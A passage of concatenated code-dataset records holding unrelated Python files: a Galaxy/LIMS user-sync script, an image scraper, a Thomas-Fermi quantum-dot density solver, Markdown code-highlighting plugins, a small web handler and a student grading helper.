Galaxy admin ones\n for user in galaxy_users:\n if not user.email in admin_users:\n session.delete(user)\n log.debug(\"Deleting user %s\" % user.email)\n # delete all groups\n for group in galaxy_groups:\n session.delete(group)\n log.debug(\"Deleting group %s\" % group.name)\n # delete all roles except private ones associated to Galaxy admin users\n for role in galaxy_roles:\n if not role.name in admin_users:\n session.delete(role)\n log.debug(\"Deleting role %s\" % role.name)\n # commit\n session.flush()\n\n\ndef create_limsusers(model, session, lims_db):\n # query Galaxy db to get users & groups\n galaxy_users = session.query(model.User)\n galaxy_groups = session.query(model.Group)\n galaxy_groupnames = []\n for user in galaxy_users:\n log.debug(\"Existing user in Galaxy: %s\" % user.email)\n for group in galaxy_groups:\n galaxy_groupnames.append(group.name)\n log.debug(\"Existing group in Galaxy: %s\" % group.name)\n\n # get CRI lims users & groups\n lims_users = lims_db.user.all()\n lims_usergroups = defaultdict(list)\n for user in lims_users:\n group = lims_db.groups.filter_by(id=user.group_id).one()\n institution = lims_db.institution.filter_by(id=group.institution_id).one()\n #log.debug(\"%s\\t%s\\t%s\\t%s\" % (user.accountId, user.email, group.name, institution.name))\n lims_usergroups[\"%s__%s\" % (institution.name.replace(' ', '_'), group.name.replace(' ', '_'))].append(user)\n\n # create lims groups & users into galaxy\n for group_name in lims_usergroups.keys():\n # create group\n galaxy_group = session.query(model.Group).filter_by(name=group_name).first()\n if not galaxy_group:\n galaxy_group = model.Group(group_name)\n session.add(galaxy_group)\n log.debug(\"+++ Add new group %s\" % galaxy_group.name)\n else:\n log.debug(\"Group %s already exists\" % galaxy_group.name)\n # create role for group\n galaxy_role = session.query(model.Role).filter_by(name=galaxy_group.name).first()\n if not galaxy_role:\n galaxy_role = model.Role(galaxy_group.name, 'Role for group %s' % galaxy_group.name)\n session.add(galaxy_role)\n log.debug(\"+++ Add new role for group %s\" % galaxy_group.name )\n else:\n log.debug(\"Role for group %s already exists\" % galaxy_group.name )\n # associate group and role\n galaxy_group_role_association = session.query(model.GroupRoleAssociation).filter_by(role_id=galaxy_role.id, group_id=galaxy_group.id).first()\n if not galaxy_group_role_association:\n galaxy_group_role_association = model.GroupRoleAssociation(galaxy_group, galaxy_role)\n session.add(galaxy_group_role_association)\n log.debug(\"+++ Associate group %s with its role %s\" % (galaxy_group.name, galaxy_role.name))\n else:\n log.debug(\"Group %s already associated with its role %s\" % (galaxy_group.name, galaxy_role.name)) \n # create users\n for lims_user in lims_usergroups[group_name]:\n galaxy_user = session.query(model.User).filter_by(email=lims_user.email, username=lims_user.accountId).first()\n if not galaxy_user:\n galaxy_user = model.User(lims_user.email)\n galaxy_user.set_password_cleartext(lims_user.password)\n galaxy_user.username = lims_user.accountId\n session.add(galaxy_user)\n log.debug(\"+++ Add new user %s\" % galaxy_user.email)\n else:\n log.debug(\"User %s already exists\" % galaxy_user.email)\n # associate user and group\n galaxy_user_group_association = session.query(model.UserGroupAssociation).filter_by(user_id=galaxy_user.id, group_id=galaxy_group.id).first()\n if not galaxy_user_group_association:\n galaxy_user_group_association = model.UserGroupAssociation(galaxy_user, galaxy_group)\n session.add(galaxy_user_group_association)\n log.debug(\"+++ Add user %s into group %s\" % (galaxy_user.email, galaxy_group.name))\n else:\n log.debug(\"User %s already in group %s\" % (galaxy_user.email, galaxy_group.name))\n # create private role for each user using user email\n private_role_name = \"%s\" % (galaxy_user.email)\n galaxy_private_role = session.query(model.Role).filter_by(name=private_role_name).first()\n if not galaxy_private_role:\n galaxy_private_role = model.Role(private_role_name, 'Private role for %s' % private_role_name, 'private')\n session.add(galaxy_private_role)\n log.debug(\"+++ Add new private role for user %s\" % private_role_name)\n else:\n log.debug(\"Private role for user %s already exists\" % private_role_name)\n # associate user and private role\n galaxy_user_private_role_association = session.query(model.UserRoleAssociation).filter_by(role_id=galaxy_private_role.id, user_id=galaxy_user.id).first()\n if not galaxy_user_private_role_association:\n galaxy_user_private_role_association = model.UserRoleAssociation(galaxy_user, galaxy_private_role)\n session.add(galaxy_user_private_role_association)\n log.debug(\"+++ Associate user %s with its private role %s\" % (galaxy_user.email, galaxy_private_role.name))\n else:\n log.debug(\"User %s already associated with its private role %s\" % (galaxy_user.email, galaxy_private_role.name))\n # associate user and group role\n galaxy_user_role_association = session.query(model.UserRoleAssociation).filter_by(role_id=galaxy_role.id, user_id=galaxy_user.id).first()\n if not galaxy_user_role_association:\n galaxy_user_role_association = model.UserRoleAssociation(galaxy_user, galaxy_role)\n session.add(galaxy_user_role_association)\n log.debug(\"+++ Associate user %s with its group role %s\" % (galaxy_user.email, galaxy_role.name))\n else:\n log.debug(\"User %s already associated with its group role %s\" % (galaxy_user.email, galaxy_role.name))\n # commit\n session.flush()\n \nif __name__ == '__main__':\n main()\n","sub_path":"admin/scripts/manage_limsusers.py","file_name":"manage_limsusers.py","file_ext":"py","file_size_in_byte":9983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"620441572","text":"from bs4 import BeautifulSoup\nimport requests\nimport _thread\nimport os,time\nclass meitu(object):\n def __init__(self,url):\n self.url = url\n self.urls = []\n self.dir = url.split('/')[5]+'/'\n if os.path.exists(self.dir) == False:\n os.mkdir(self.dir)\n self.locks = []\n self.nloops = []\n self.direct = ''\n def download(self,url,lock):\n web_content = requests.get(url)\n soup = BeautifulSoup(web_content.text,'lxml')\n imgs_list = soup.body.find(class_ = \"imgs-list\").div.find_all(\"img\")\n imgs_urls = []\n for i in imgs_list:\n imgs_urls.append(i.attrs[\"src\"])\n print(\"解析图片地址成功,开始下载!\")\n self.direct = imgs_urls[0].split('/')[:-1][-1]\n for u in imgs_urls:\n r = requests.get(u)\n with open(self.dir+u.split('/')[-1].split('?')[0], \"wb\") as code:\n code.write(r.content)\n lock.release()\n def geturls(self):\n web_content = requests.get(self.url)\n soup = BeautifulSoup(web_content.text,'lxml')\n detail_page = soup.body.find(class_ = ['detail-pag','meitu-page']).find_all(\"a\")\n for i in detail_page:\n self.urls.append(i.attrs[\"href\"])\n print(\"解析页面地址成功!\")\n def check(self):\n files = os.listdir(self.dir)\n fails = []\n for i in files:\n if os.path.getsize(self.dir+i) == 0:\n fails.append(i)\n if fails != []:\n self.direct = \"http://img.qqzhpt.com/meitustatic/images/img/\"+self.direct+'/'\n print(\"存在文件下载失败,尝试重新下载\")\n for f in fails:\n r = requests.get(self.direct+f)\n with open(self.dir+f, \"wb\") as code:\n code.write(r.content)\n def run(self):\n print(\"爬取开始!\")\n self.geturls()\n self.nloops = range(len(self.urls))\n for i in self.nloops:\n lock = _thread.allocate_lock()\n lock.acquire()\n self.locks.append(lock)\n for i in self.nloops:\n _thread.start_new_thread(self.download,(self.urls[i],self.locks[i],))\n while True:\n flag = 0\n for i in self.nloops:\n if self.locks[i].locked():\n flag = 1\n if flag == 0:\n break\n self.check()\n","sub_path":"qqzhpt.py","file_name":"qqzhpt.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"183215383","text":"# https://careercup.com/question?id=16230693\n\ndef solution(nums, target):\n size = len(nums)\n ops = [[]]\n for i in range(size):\n new_ops = []\n for op in ops:\n for i in (1, 0, -1):\n new_ops.append(op + [i])\n ops = new_ops\n ops.pop()\n\n res = []\n for op in ops:\n cur_sum = 0\n for i in range(len(nums)):\n cur_sum += op[i] * nums[i]\n if cur_sum == target:\n res.append(op)\n return res\n","sub_path":"plus_minus_to_target.py","file_name":"plus_minus_to_target.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"134190026","text":"\n\nfrom xai.brain.wordbase.verbs._bequeath import _BEQUEATH\n\n#calss header\nclass _BEQUEATHS(_BEQUEATH, ):\n\tdef __init__(self,): \n\t\t_BEQUEATH.__init__(self)\n\t\tself.name = \"BEQUEATHS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"bequeath\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_bequeaths.py","file_name":"_bequeaths.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"208292927","text":"# Module for Thomas-Fermi calculation of electron density along a 1D potential\n\nimport numpy as np\nimport mask\nfrom physics import Physics\nimport scipy.optimize\n \nclass ThomasFermi(Physics):\n '''\n Subclass of the Physics class. Used for all Thomas-Fermi calculations \n '''\n\n def __init__(self,physics):\n Physics.__init__(self,physics)\n \n # There are two broad TF solvers. One of them is a fixed mu solver, which given the dot potentials, finds the expected charge density.\n # The other is a fixed N solver, which given number of electron on each dot, finds the expected charge density.\n # Both solvers take in an initial mask and require the number of dots to be known in advance.\n \n def find_n_dot_estimate(self,fix_mask):\n '''\n Estimate the number of dots and a mask assuming the chemical potential is mu_l everywhere\n\n The mask is defined as a list of size len(x) where x is the x-grid. Each element is labelled as 'l0','l1' corresponding to the leads, 'di' corresponding \n to the ith dot and 'bi' corresponding to the ith barrier.\n\n Counting begins from 0.\n ''' \n\n mu = self.mu_l[0] \n mu_x = np.repeat(mu,len(self.V))\n \n # Use mu - V ~ n to make a preliminary classfication \n if(not fix_mask):\n prelim_mask = mask.Mask(mu_x - self.V) \n self.mask = prelim_mask\n return prelim_mask.mask_info['num_dot'] \n else:\n # return value from the old calculation\n return self.mask.mask_info['num_dot'] \n \n def calculate_mu_x_from_mask(self,mu_d):\n '''\n Takes in a mask object and uses it to form an array of mu_x. The vector is zero in barrier regions by design since the chemical potential is an unknown in the barrier region.\n\n The lead potentials are taken from the underlying physics object and the mu_d is taken as an argument to this function.\n '''\n \n mu_x = np.zeros(len(self.mask.mask))\n for key,val in self.mask.mask_info.items():\n if (key == 'l0'):\n mu_x[val[0]:val[1] + 1] = self.mu_l[0] \n elif (key == 'l1'):\n mu_x[val[0]:val[1] + 1] = self.mu_l[1] \n elif (key[0] == 'd'):\n mu_x[val[0]:(val[1] + 1)] = mu_d[int(key[1:])]\n else:\n # region is a barrier\n # leave untounced i.e = 0 since the potential over a barrier is an unknown\n pass\n return mu_x \n \n def create_fixed_mu_A(self,mu_d):\n '''\n Creates the LHS matrix for fixed mu Thomas Fermi calculation.\n A z = b\n where z = (n N_d mu_bar)\n A =\n (K 0 mu_bar_constraint\n sum_n N_d_constraint 0\n mu_bar_constraint 0 0)\n '''\n N_grid = len(self.mask.mask)\n num_dot = self.mask.mask_info['num_dot']\n num_barrier_points = self.mask.mask.count('b') \n N_A = N_grid + num_dot + num_barrier_points\n A = np.zeros((N_A,N_A))\n \n A[:N_grid,:N_grid] = self.K\n\n barrier_col_index = N_grid + num_dot \n for key,val in self.mask.mask_info.items():\n # implement the n = 0 barrier constraint thorugh the Lagrange multipliers mu_bar\n if key[0] == 'b':\n barrier_size = val[1] - val[0] + 1 \n A[val[0]:(val[0] + barrier_size),barrier_col_index:(barrier_col_index + barrier_size) ] = -1.0*np.identity(barrier_size)\n A[barrier_col_index:(barrier_col_index + barrier_size),val[0]:(val[0] + barrier_size) ] = np.identity(barrier_size)\n barrier_col_index += barrier_size\n \n # implement the sum_n over dot - N_d constraint\n elif key[0] == 'd':\n dot_col_index = N_grid + int(key[1:])\n dot_size = val[1] - val[0] + 1\n A[dot_col_index,val[0]:(val[0] + dot_size)] = 1 \n A[dot_col_index,dot_col_index] = -1\n return A\n\n def create_fixed_mu_b(self,mu_d):\n '''\n Creates the RHS column vector for fixed mu Thomas Fermi Calculation.\n A z = b\n b =\n ( mu_x - V\n 0\n 0)\n '''\n\n N_grid = len(self.mask.mask)\n num_dot = self.mask.mask_info['num_dot']\n num_barrier_points = self.mask.mask.count('b') \n N_b = N_grid + num_dot + num_barrier_points\n b = np.zeros(N_b)\n \n mu_x = self.calculate_mu_x_from_mask(mu_d)\n b[:N_grid] = mu_x - self.V\n \n return b \n\n def create_fixed_N_A(self,N_d):\n '''\n Creates the LHS matrix for fixed N Thomas Fermi calculation.\n A z = b\n A =\n (K mu_d_constraint mu_bar_constraint\n sum_n 0 0\n mu_bar_constraint 0 0)\n '''\n N_grid = len(self.mask.mask)\n num_dot = self.mask.mask_info['num_dot']\n num_barrier_points = self.mask.mask.count('b') \n N_A = N_grid + num_dot + num_barrier_points\n A = np.zeros((N_A,N_A))\n \n \n A[:N_grid,:N_grid] = self.K\n\n barrier_col_index = N_grid + num_dot \n for key,val in self.mask.mask_info.items():\n # implement the n = 0 barrier constraint thorugh the Lagrange multipliers mu_bar\n if key[0] == 'b':\n barrier_size = val[1] - val[0] + 1 \n A[val[0]:(val[0] + barrier_size),barrier_col_index:(barrier_col_index + barrier_size) ] = -1.0*np.identity(barrier_size)\n A[barrier_col_index:(barrier_col_index + barrier_size),val[0]:(val[0] + barrier_size) ] = np.identity(barrier_size)\n barrier_col_index += barrier_size\n \n # implement the sum_n over dot - N_d constraint\n elif key[0] == 'd':\n dot_col_index = N_grid + int(key[1:])\n dot_size = val[1] - val[0] + 1\n A[dot_col_index,val[0]:val[0] + dot_size] = 1 \n A[val[0]:val[0] + dot_size,dot_col_index] = -1\n return A\n\n def create_fixed_N_b(self,N_d):\n '''\n Creates the RHS matrix for fixed N Thomas Fermi calculation\n A z = b\n\n b = \n (-V+mu_x\n N_d\n 0)\n where mu_x is calculated with dot_potentials = 0\n '''\n N_grid = len(self.mask.mask)\n num_dot = self.mask.mask_info['num_dot']\n num_barrier_points = self.mask.mask.count('b') \n N_b = N_grid + num_dot + num_barrier_points\n b = np.zeros(N_b)\n \n # mu_l - V, this is an easy way to use mu_x to calculate \n # set the mu_d to zero\n mu_d = [0.0]*num_dot\n mu_x = self.calculate_mu_x_from_mask(mu_d)\n b[:N_grid] = mu_x - self.V\n b[N_grid:N_grid + num_dot] = N_d\n \n return b\n \n def tf_solver_fixed_mu(self,mu_d):\n '''\n Assumes a mask object and a array of mu_d dot chemical potentials\n The lead potentials are taken from self.mu_l and not explicitly given.\n\n This solves the equation V - mu_mask + K n = 0. The constraint of n = 0 in the barriers is implemented according to the mask.\n Return a n(x) : electron density, N_d : estimate of electrons on each dot\n \n N_dot elements are not integers!\n '''\n if(len(mu_d) != self.mask.mask_info['num_dot']):\n # number of dots in mu_d does not match in the mask\n # This means that mu_d provided is wrong or there is a problem with the mask.\n raise ValueError('Calculation of mu_x failed. Check number of dots in mu_d and the mask') \n \n # Formulate the problem as A z = b\n # z = (n N_d mu_bar) \n \n A = self.create_fixed_mu_A(mu_d) \n b = self.create_fixed_mu_b(mu_d)\n\n z = np.linalg.solve(A,b)\n\n num_dot = len(mu_d)\n N_grid = len(self.mask.mask)\n \n return z[:N_grid],z[N_grid:(N_grid + num_dot)] \n\n def tf_solver_fixed_N(self,N_d):\n '''\n Uses the self.mask object and number of electrons in each dot.\n The lead potentials are taken from self.mu_l and not explicitly given.\n \n It solves the equation V - mu + K n = 0 iteratively for the mask and n(x). The constraint of n = 0 in the barriers is implemented according to the mask.\n\n Returns a n(x) : electron density and mu_d : dot potentials \n ''' \n if(len(N_d) != self.mask.mask_info['num_dot']):\n # number of dots in N_d does not match in the mask\n # This means that mu_d provided is wrong or there is a problem with the mask.\n raise ValueError('Calculation of mu_x failed. Check number of dots in N_d and the mask') \n \n # Formulate the problem as A z = b\n # z = (n mu_d mu_bar) \n\n A = self.create_fixed_N_A(N_d) \n b = self.create_fixed_N_b(N_d)\n\n z = np.linalg.solve(A,b)\n\n num_dot = len(N_d)\n N_grid = len(self.mask.mask)\n return z[:N_grid],z[N_grid:(N_grid + num_dot)] \n\n def tf_solver_fixed_N_opt(self,N_d):\n '''\n Takes in a mask object and number of electrons on each dot.\n The lead potentials are taken from self.mu_l and are not explicitly given.\n\n Optional Solver based on scipy.optimize.minimize. Has the added advantage that n >= 0 can be implemented as a constraint.\n '''\n\n def energy(n,V,mu_x,K):\n return np.sum((V - 0.0*mu_x)*n) + 0.5*np.sum(n*np.dot(K,n))\n \n def dot_constraint_function(n,mask,N_d):\n err = 0.0\n for key,val in self.mask.mask_info.items():\n if (key[0] == 'd'):\n err += np.abs(np.sum(n[val[0]:(val[1]+1)]) - N_d[int(key[1:])])\n return err\n \n # easy way to create the required mu_x profile using mu_d = [0] \n mu_x = self.calculate_mu_x_from_mask([0]*self.mask.mask_info['num_dot'])\n\n cons = {'type':'eq','fun':(lambda x: dot_constraint_function(x,self.mask,N_d))}\n\n # initial guess for the solution\n n_0 = np.zeros(len(self.V))\n # bounds parameter defines that n >= 0\n root = scipy.optimize.minimize(lambda x : energy(x,self.V,mu_x,self.K),n_0,bounds=[(0,None)]*len(n_0),constraints=cons)\n\n # find the dot_potentials using V + Kn = mu\n # The dot potential is found from mu calculated at the center of each dot\n mu_d = np.zeros(self.mask.mask_info['num_dot'])\n mu_vec = self.V + np.dot(self.K,root.x)\n for key,val in self.mask.mask_info.items():\n if key[0] == 'd':\n dot_index = int(key[1:])\n dot_center_index = int(0.5*(val[0] + val[1]))\n mu_d[dot_index] = mu_vec[dot_center_index] \n return root.x,mu_d\n\n # Iterative fixed mu solver is not very useful since if the mu is fixed, the turning points do not change. Hence there is nothing to iterative over.\n # If you are thinking that the potential could be replaced by the effective potential V_eff = V + Kn in each iteration, by the solver V + Kn = mu, hence there are no changes in thr mask.\n def tf_iterative_solver_fixed_mu(self,mu_d,N_lim = 10):\n '''\n Solve the TF problem iteratively until the mask converges.\n\n In each iteration, the potential is updated to the effective potential \n V_eff = V + K.n\n\n The iteration ends when the mask converges to a fixed value or N_lim iterations are reached.\n '''\n old_mask = self.mask.mask\n i = 0\n while(i < N_lim):\n n,N_d = self.tf_solver_fixed_mu(mu_d) \n \n self.mask.calculate_new_mask_turning_points(self.V,self.mu_l,mu_d)\n self.mask.calculate_mask_info_from_mask()\n \n if(old_mask == self.mask.mask):\n break \n old_mask = self.mask.mask\n i += 1\n if(i == N_lim):\n raise Exception(\"Mask failed to converge in Thomas Fermi iterative fixed mu solver.\") \n return n,N_d\n\n def tf_iterative_solver_fixed_N(self,N_d,N_lim = 10,strategy='opt_iter'):\n '''\n Solve the TF problem iteratively until the mask converges.\n\n In each iteration, the potential is updated to the effective potential \n V_eff = V + K.n\n\n The iteration ends when the mask converges to a fixed value or N_lim iterations are reached.\n '''\n # simple strategy uses the fixed N solver only once\n # does not iterate to find a mask beyond the prelim_mask\n if strategy == 'simple':\n n,mu_d = self.tf_solver_fixed_N(N_d) \n return n,mu_d\n\n # simple_iter strategy uses the fixed N solver iteratively\n # in each iteration, depending on the new chemical potential(s) found, the turning points\n # and the mask is updated until the mask converges to a fixed value\n # N_d is recalcualted from the new mask to handle cases where new smaller dots are formed\n elif strategy == 'simple_iter':\n old_mask = self.mask.mask\n i = 0\n while(i < N_lim):\n n,mu_d = self.tf_solver_fixed_N(N_d) \n \n self.mask.calculate_new_mask_turning_points(self.V,self.mu_l,mu_d)\n self.mask.calculate_mask_info_from_mask()\n \n if(old_mask == self.mask.mask):\n break \n old_mask = self.mask.mask\n N_d = self.calculate_N_d_from_n(n)\n i += 1\n if(i == N_lim):\n raise Exception(\"Mask failed to converge in Thomas Fermi simple iterative fixed N solver.\") \n return n,mu_d\n \n elif strategy == 'opt': \n n,mu_d = self.tf_solver_fixed_N_opt(N_d)\n return n,mu_d\n\n elif strategy == 'opt_iter': \n old_mask = self.mask.mask\n i = 0\n while(i < N_lim):\n n,mu_d = self.tf_solver_fixed_N_opt(N_d) \n \n self.mask.calculate_new_mask_turning_points(self.V,self.mu_l,mu_d)\n self.mask.calculate_mask_info_from_mask()\n \n if(old_mask == self.mask.mask):\n break \n old_mask = self.mask.mask\n N_d = self.calculate_N_d_from_n(n)\n i += 1\n if(i == N_lim):\n raise Exception(\"Mask failed to converge in Thomas Fermi iterative fixed N solver.\") \n return n,mu_d\n\n else:\n raise Exception(\"Unknown strategy in iterative fixed N solver.\")\n\n def calculate_thomas_fermi_energy(self,n,mu_d):\n '''\n Input: \n n : electron density\n mu_d : dot potentials\n Output:\n E : Thomas-Fermi energy\n\n E = V n + 1/2 n K n\n '''\n #n_without_leads = np.zeros(len(n))\n #for i in range(len(n)):\n # if(self.mask.mask[i] != 'l'):\n # n_without_leads[i] = n[i]\n n_without_leads = n\n E = np.sum(self.V*n_without_leads) + 0.5 * np.sum(n_without_leads*np.dot(self.K,n_without_leads.T)) \n return E\n\n def calculate_N_d_from_n(self,n):\n '''\n Input:\n n : electron density\n Output:\n N_d : vector of size mask.mask_info['num_dot'] with number of electrons on each dot according to self.mask and n\n '''\n N_d = np.zeros(self.mask.mask_info['num_dot'])\n for key,val in self.mask.mask_info.items():\n if key[0] == 'd':\n dot_index = int(key[1:])\n N_d[dot_index] = np.sum(n[val[0]:(val[1] + 1)])\n return N_d\n","sub_path":"nanowire_model/thomas_fermi.py","file_name":"thomas_fermi.py","file_ext":"py","file_size_in_byte":15873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"131867339","text":"# -*- coding: utf-8 -*-\n\nimport re\nfrom pygments import highlight\nfrom pygments import lexers\nfrom pygments import formatters\n\n###### def\ndef pygmentize(code_raw, language):\n lexer = lexers.get_lexer_by_name(language, encoding='utf-8', startinline=True)\n return highlight(code_raw, lexer, formatters.HtmlFormatter(encoding=\"utf-8\",startinline=True))\n\ndef tableize_code (text, lang = \"\"):\n string = text.strip()\n table = ['
    ']\n    code = []\n    index = 0\n    for line in string.split(\"\\n\"):\n        table.append(\"%d\\n\" % (index+1))\n        code.append(\"%s\" % line)\n        index += 1\n    table.append(\"
    %s
    \" % (lang, \"\\n\".join(code)))\n return \"\".join(table)\n\ndef strip_hl_div(text):\n __HL_RE = re.compile('
    (.+?)
    ', re.UNICODE|re.I|re.M|re.S)\n m = __HL_RE.match(text)\n if m:\n return text.replace(m.group(0), m.group(1))\n return text\n\n\n####### code block #####\ndef code_block(text):\n \"\"\"\n Syntax\n {% codeblock [title] [lang:language] [url] [link text] %}\n code snippet\n {% endcodeblock %}\n \"\"\"\n __CODE_BLOCK_RE = re.compile(r\"\"\"\\s({% codeblock ([^%\\[\\]]*)%}(.+?){% endcodeblock %})\"\"\",re.I|re.M|re.S)\n __CaptionUrlTitle = re.compile('(\\S[\\S\\s]*)\\s+(https?:\\/\\/\\S+|\\/\\S+)\\s*(.+)?', re.UNICODE|re.I|re.M|re.S)\n __Caption = re.compile('(\\S[\\S\\s]*)', re.UNICODE|re.I|re.M|re.S)\n __Lang = re.compile('\\s*lang:(\\S+)', re.UNICODE|re.I|re.M|re.S)\n\n codes = __CODE_BLOCK_RE.findall(text)\n for code in codes:\n caption = \"\"\n filetype = \"\"\n fileurl = \"\"\n code_block_str = code[0]\n code_info = code[1]\n code_raw = code[2]\n if code_info:\n m = __Lang.search(code_info)\n if m:\n filetype = m.group(1)\n code_info = __Lang.sub(\"\", code_info)\n m = __CaptionUrlTitle.match(code_info)\n if m:\n filename = m.group(1)\n caption = \"
    %s%s
    \\n\" % (m.group(1), m.group(2), m.group(3))\n else:\n m2 = __Caption.match(code_info)\n if m2:\n filename = m2.group(1)\n caption = \"
    %s
    \\n\" % m2.group(1)\n else:\n filename = \"\"\n caption = \"\"\n if not filetype and filename:\n m = re.search(r\"\\S[\\S\\s]*\\w+\\.(\\w+)\", filename)\n if m:\n filetype = m.group(1)\n\n #\n source = [\"
    \"]\n if caption:\n source.append(caption)\n if filetype:\n try:\n hltext = pygmentize(code_raw, filetype)\n tmp_text = tableize_code (strip_hl_div(hltext), filetype)\n except:\n tmp_text = tableize_code (code_raw.replace('<','<').replace('>','>'))\n else:\n tmp_text = tableize_code (code_raw.replace('<','<').replace('>','>'))\n source.append(tmp_text)\n source.append(\"
    \")\n #print \"\\n\".join(source)\n text = text.replace(code_block_str, \"\\n\".join(source))\n\n return text\n\n### Backtick Code Blocks ###\ndef backtick_code_block(text):\n \"\"\"\n Syntax\n ``` [language] [title] [url] [link text]\n code snippet\n ```\n \"\"\"\n __CODE_BLOCK_RE = re.compile(r\"\"\"\\s(^`{3} *([^\\n]+)?\\n(.+?)\\n`{3})\"\"\",re.I|re.M|re.S)\n __AllOptions = re.compile('([^\\s]+)\\s+(.+?)\\s+(https?:\\/\\/\\S+|\\/\\S+)\\s*(.+)?', re.UNICODE|re.I|re.M|re.S)\n __LangCaption = re.compile('([^\\s]+)\\s*(.+)?', re.UNICODE|re.I|re.M|re.S)\n codes = __CODE_BLOCK_RE.findall(text)\n for code in codes:\n options = \"\"\n caption = \"\"\n lang = \"\"\n fileurl = \"\"\n code_block_str = code[0]\n code_info = code[1]\n code_raw = code[2]\n if code_info:\n m = __AllOptions.match(code_info)\n if m:\n lang = m.group(1)\n caption = \"
    %s%s
    \" % (m.group(2), m.group(3), m.group(4))\n else:\n m2 = __LangCaption.match(code_info)\n if m2:\n lang = m2.group(1)\n caption = \"
    %s
    \" % m2.group(2)\n if re.match('\\A( {4}|\\t)', code_raw):\n code_raw = re.sub('^( {4}|\\t)', '', code_raw)\n\n #\n source = [\"
    \"]\n if caption:\n source.append(caption)\n\n if not lang or lang == 'plain':\n tmp_text = tableize_code (code_raw.replace('<','<').replace('>','>'))\n else:\n try:\n hltext = pygmentize(code_raw, lang)\n tmp_text = tableize_code (strip_hl_div(hltext), lang)\n except:\n tmp_text = tableize_code (code_raw.replace('<','<').replace('>','>'))\n\n source.append(tmp_text)\n source.append(\"
    \")\n text = text.replace(code_block_str, \"\\n\".join(source))\n return text\n\n### VideoTag ###\ndef videotag(text):\n \"\"\"\n Syntax\n {% video url/to/video [width height] [url/to/poster] %}\n \"\"\"\n __VIDEOTAG_RE = re.compile(r\"\"\"\\s({% video (https?:\\S+)(\\s+(https?:\\S+))?(\\s+(https?:\\S+))?(\\s+(\\d+)\\s(\\d+))?(\\s+(https?:\\S+))? %})\"\"\",re.I|re.M|re.S)\n codes = __VIDEOTAG_RE.findall(text)\n vtype = {\n 'mp4': \"type='video/mp4; codecs=\\\"avc1.42E01E, mp4a.40.2\\\"'\",\n 'ogv': \"type='video/ogg; codecs=theora, vorbis'\",\n 'webm': \"type='video/webm; codecs=vp8, vorbis'\"\n }\n\n for code in codes:\n video = code[1]\n width = int(code[7])\n height = int(code[8])\n poster = code[10]\n\n if video and width > 0 and height > 0:\n video_code = []\n video_code.append(\"\")\n text = text.replace(code[0], \"\".join(video_code))\n\n return text\n\n###########\ndef parse_text(text):\n #text = code_block(text)\n text = videotag(text)\n text = backtick_code_block(text)\n return text\n","sub_path":"plugins.py","file_name":"plugins.py","file_ext":"py","file_size_in_byte":6619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"281738474","text":"import os\nimport webapp2\n\nclass MainPage(webapp2.RequestHandler):\n def get(self):\n path = os.path.join(os.path.dirname (__file__), 'index.min.html')\n f = open(\"index.min.html\", \"r\")\n self.response.headers ['Content-Type'] = 'text/html'\n self.response.write(f.read())\n\napplication = webapp2.WSGIApplication([\n ('/', MainPage),\n], debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"77425489","text":"import json\nfrom lib.file_management.file_management_lib import FileEditor, DirManagement, WorkEditor\nimport os\nimport sys\nimport inspect\nimport time\ncurrentdir = os.path.dirname(os.path.abspath(\n inspect.getfile(inspect.currentframe())))\nsys.path.insert(0, currentdir)\n\n\ndef inask(question: str) -> str:\n \"\"\"\n this fnc made for test because we need user input but intest it cant typing itself os it need to call patch module\n but it need to create a sperate function and call it in function that we want to use\n Args:\n question (str): any string\n Returns:\n str: user input\n \"\"\"\n answer = input(question)\n return answer\n\n\nclass StudentData:\n def __init__(self, path: str, filename: str, draft: dict) -> None:\n \"\"\"\n init draft \n draft_file (str) \n draft_work (list)\n if user did not have draft.json it will return None\n Args:\n path (str): path of work directory\n filename (str): name of student's directory of file\n \"\"\"\n self.draft_file = draft[\"fileDraft\"]\n self.draft_out = draft[\"outputDraft\"]\n self.pre_data = None\n self.filename = filename\n\n def _filename_pre_data(self) -> dict:\n \"\"\"prepare filename to dict\n pseudo code:\n -get key word form file draft and store it in key\n -split filename with \"_\" so we will got list of student name, id, ex, etc.\n -we will zip it together and store into prework(dict) that keep student data and key word \n example: {\"student_id\": \"1234567890\", \"name\": \"Alex\", \"ex\": \"ex1}\n Returns:\n dict: student data form file name\n \"\"\"\n key = []\n remainder = \"\"\n prework = {}\n for i in self.draft_file:\n if i == \"{\":\n remainder = \"\"\n elif i == \"}\":\n key.append(remainder)\n else:\n remainder += i\n list_filename = self.filename.split(\"_\")\n for key, value in zip(key, list_filename):\n prework[key] = value\n self.pre_data = prework\n\n def check_work_score(self,work_score):\n for i in work_score:\n if i[\"studentId\"] == self.pre_data[\"studentId\"]:\n return False\n return True \n \n def prepare_student_data(self) -> dict:\n \"\"\"make that studect_data(dict) ready for the next step by get the output draft \n and set it into student_data and have its value is \"N/\"A\n Returns:\n dict: empty student data that have only data from file name but another is \"N/A\"\n \"\"\"\n self._filename_pre_data()\n empty_student = {}\n empty_student[\"scoreTimestamp\"] = \"N/A\"\n for i in self.draft_out:\n empty_student[i] = \"N/A\"\n for i in self.pre_data:\n empty_student[i] = self.pre_data[i]\n self.pre_data = empty_student\n\n def data_input(self, post_student_data: dict) -> dict:\n \"\"\"get data form user and set into student data(dict)\n pseudo code:\n for loop post_student_data and if its \"N/A\" ask user for information\n and store it. But if the input was -99 it will skip that question to next one\n and when its finish it will return post_student_data\n example:\n {'student_id': '6310546066', 'name': 'vitvara', 'ex': 'ex1', 'score1': '10', 'score2': '20', 'comment': 'nice work'}\n Args:\n post_student_data (dict): empty_student_data\n Returns:\n dict: student data that ready to write\n 